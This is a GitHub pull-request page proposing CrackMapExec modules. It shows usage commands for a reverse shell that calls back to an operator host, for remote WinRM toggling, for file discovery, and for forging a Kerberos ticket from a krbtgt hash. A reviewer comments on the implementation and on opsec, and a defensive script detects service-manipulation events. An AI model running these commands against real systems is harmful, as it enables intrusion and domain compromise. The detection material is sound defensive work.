This repository has been archived by the owner on Dec 6, 2023. It is now read-only.

modules for cme #705

Open

wants to merge 5 commits into base: master

Conversation


@e1abrador e1abrador commented Dec 24, 2022

Modules pushed:

file_discovery:

crackmapexec smb 192.168.163.144 -u 'Admin2' -p 'Password!' -M file_discovery -o SEARCH_PATH=C:\\Users

revshell:

crackmapexec smb 192.168.163.144 -u 'Admin2' -p 'Password!' -M reverse_shell -o LHOST=192.168.163.136 LPORT=1234 HTTP_SERVER=8443

winrm:

crackmapexec smb 192.168.163.142 -u Admin2 -p 'Password123!' -M winrm -o ACTION=ENABLE
crackmapexec smb 192.168.163.142 -u Admin2 -p 'Password123!' -M winrm -o ACTION=DISABLE

gettgt:

crackmapexec smb 192.168.246.139 -u Administrador -H 2b576acbe6bcfda7294d6bd18041b8fe -M gettgt -o KRBTGT_NTLM=70a415ccf57e2a3c781764a3b1beee95 TARGET_USER=domain_user

@e1abrador e1abrador changed the title file_discovery cme module modules for cme Mar 31, 2023
@ILightThings (Contributor)

Although the ambition is great, I don't think gettgt is done in a very efficient way.

From what I can read, you are checking to see if impacket is installed. If it is not installed, then you download the impacket repo to /opt/impacket and run the setup.py script to install impacket. And then you use a subprocess to run ticketer.py to request a ticket.

3f9f0e4#diff-7d45a018c200c99099fee9a07a3e87a1021598d8a56220be40b18eeec7dbe500R38

Although that would make a great shell script, crackmapexec is built around impacket, so it would likely already be installed. What you could try doing is reading the ticketer script and re-implementing it as an impacket module, similar to how this pull request was done.

b2eb3b7.

But running this module could actively break crackmapexec under the right circumstances.

@ILightThings (Contributor)

Regarding WinRM.py, RevShell.py, and File_discovery, from the looks of it, you are logging in and using PowerShell to run these commands. Although this might be ideal for RevShell.py, using the remote services manager (\pipe\svcctl) to enable/disable services (like WinRM) would be more opsec safe. This is also how SMBExec and PsExec work. See https://github.com/fortra/impacket/blob/master/examples/psexec.py

File_discovery is also interfacing with PowerShell, but we do have spider_plus and spider to do file lookups.

I am not the developer or main contributor to CME, so my word doesn't mean a lot, but I would check out some of the other modules to grow and expand on these.

Hope this helps.
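The review comment above points out that enabling or disabling a service through the Service Control Manager (\pipe\svcctl) is how PsExec/SMBExec-style tooling operates. From the defender's side, those actions leave a characteristic trail in the Windows System log: the SCM records a start-type change as Event ID 7040, a state change as Event ID 7036, and a newly installed service as Event ID 7045. The following triage script is an added example, not code from this pull request or from CrackMapExec; the event records it parses are constructed for the example, and the `(event_id, message)` tuple layout is a simplification of an exported System log.

```python
"""
Added example (not part of the pull request or of CrackMapExec): triage of
Windows System-log events produced when a service such as WinRM is enabled or
started through the Service Control Manager, or when a new service is installed
in the style of PsExec/SMBExec. Sample records are constructed for this example.
"""
import re
from dataclasses import dataclass

# Constructed sample records: (EventID, message text) as the Service Control
# Manager writes them to the System log. The 7045 message body spans several
# lines, as it does in a real export.
SAMPLE_EVENTS = [
    (7040, "The start type of the Windows Remote Management (WS-Management) "
           "service was changed from disabled to auto start."),
    (7036, "The Windows Remote Management (WS-Management) service entered the running state."),
    (7036, "The Print Spooler service entered the stopped state."),
    (7045, "A service was installed in the system.\r\n"
           "Service Name: SVC-EXAMPLE\r\n"                              # constructed name
           "Service File Name: %COMSPEC% /Q /c C:\\Windows\\Temp\\example.bat\r\n"
           "Service Type: user mode service\r\n"
           "Service Start Type: demand start\r\n"
           "Service Account: LocalSystem"),
]

WINRM_SERVICE = "Windows Remote Management (WS-Management)"

# Message patterns for the three SCM event IDs of interest.
START_TYPE_RE = re.compile(
    r"The start type of the (?P<svc>.+?) service was changed from (?P<old>.+?) to (?P<new>.+?)\.")
STATE_RE = re.compile(r"The (?P<svc>.+?) service entered the (?P<state>\w+) state\.")
INSTALL_RE = re.compile(r"Service Name: (?P<name>.+?)\r?\nService File Name: (?P<path>.+?)(?:\r?\n|$)")

# Binary paths that indicate a command interpreter wrapped in a service, which
# is the shape of service-based remote execution rather than a normal install.
INTERPRETER_RE = re.compile(r"%COMSPEC%|cmd\.exe|powershell", re.IGNORECASE)


@dataclass
class Finding:
    event_id: int
    service: str
    detail: str
    severity: str


def triage(events):
    """Return one Finding per event that matches the service-manipulation patterns."""
    findings = []
    for event_id, message in events:
        if event_id == 7040:
            m = START_TYPE_RE.search(message)
            if m and m.group("svc") == WINRM_SERVICE:
                # Going from disabled to any other start type is the change an
                # operator would make right before using WinRM for access.
                severity = "high" if m.group("old") == "disabled" else "medium"
                findings.append(Finding(7040, m.group("svc"),
                                        f"start type {m.group('old')} -> {m.group('new')}", severity))
        elif event_id == 7036:
            m = STATE_RE.search(message)
            if m and m.group("svc") == WINRM_SERVICE and m.group("state") == "running":
                findings.append(Finding(7036, m.group("svc"), "entered running state", "medium"))
        elif event_id == 7045:
            m = INSTALL_RE.search(message)
            if m:
                path = m.group("path")
                severity = "high" if INTERPRETER_RE.search(path) else "low"
                findings.append(Finding(7045, m.group("name"), f"installed with binary path {path}", severity))
    return findings


def winrm_enabled_and_started(events):
    """True when the log shows WinRM both switched on (7040) and started (7036)."""
    ids = {f.event_id for f in triage(events) if f.service == WINRM_SERVICE}
    return {7040, 7036} <= ids


if __name__ == "__main__":
    for f in triage(SAMPLE_EVENTS):
        print(f"[{f.severity:6}] {f.event_id} {f.service}: {f.detail}")
    print("WinRM enabled and started:", winrm_enabled_and_started(SAMPLE_EVENTS))
```

The stopped Print Spooler record is deliberately included to show that ordinary service activity is not flagged; only the WinRM start-type change, the WinRM start, and the interpreter-wrapped service install produce findings.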
